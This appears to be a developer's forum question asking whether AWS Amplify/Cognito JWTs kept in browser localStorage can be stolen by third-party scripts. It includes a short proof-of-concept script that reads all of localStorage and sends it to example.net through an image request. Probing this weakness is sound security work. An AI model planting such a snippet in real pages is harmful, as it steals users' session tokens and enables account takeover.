I'm working through the aws-samples/aws-amplify-vue sample that uses aws/aws-amplify. I'm trying to understand how JWT is used with Cognito for authentication and I don't understand how the JWTs I receive after authentication are protected from being exfiltrated and used by any of the third party JavaScript libraries I might be using.
I cloned the example and followed the instructions to get it set up. Then I modified index.html to include an extra <script>:
<script src="https://example.com/list-localstorage.js"></script>
Then I host list-localstorage.js on example.com. The contents are:
// Ref: https://stackoverflow.com/a/28306101/624726
var allStorage = Object.keys(localStorage).reduce(function(obj, str) {
obj[str] = localStorage.getItem(str);
return obj
}, {});
// Ref: https://stackoverflow.com/a/5049668/624726
(new Image).src = 'https://example.net/log-storage?' + JSON.stringify(allStorage);
When I watch the access logs for example.net, I see my JWTs getting logged. I was able to verify the signature on the id and access tokens.
Would those be usable to access protected content? What are they doing to prevent (ex:) a malicious JavaScript ad from reading all the data in localStorage and stealing, using my JWTs?
